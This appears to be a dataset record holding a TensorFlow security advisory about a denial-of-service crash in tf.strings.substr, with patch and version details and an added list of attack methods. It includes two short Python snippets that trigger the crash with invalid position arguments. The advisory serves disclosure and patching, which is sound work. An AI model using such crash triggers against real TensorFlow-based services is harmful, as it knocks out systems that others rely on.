{"description": "### Impact\nAn attacker can cause a denial of service via `CHECK`-fail in  `tf.strings.substr` with invalid arguments:\n\n```python \nimport tensorflow as tf\ntf.strings.substr(input='abc', len=1, pos=[1,-1])\n```\n\n```python\nimport tensorflow as tf\ntf.strings.substr(input='abc', len=1, pos=[1,2])\n```\n\n### Patches\nWe have received a patch for the issue in GitHub commit [890f7164b70354c57d40eda52dcdd7658677c09f](https://github.com/tensorflow/tensorflow/commit/890f7164b70354c57d40eda52dcdd7658677c09f).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported in [#46900](https://github.com/tensorflow/issues/46900) and fixed in [#46974](https://github.com/tensorflow/issues/46974).", "methods": ["Denial of Service (DoS) via CHECK-fail in `tf.strings.substr` with invalid arguments.", "Use of invalid arguments in `tf.strings.substr` function."]}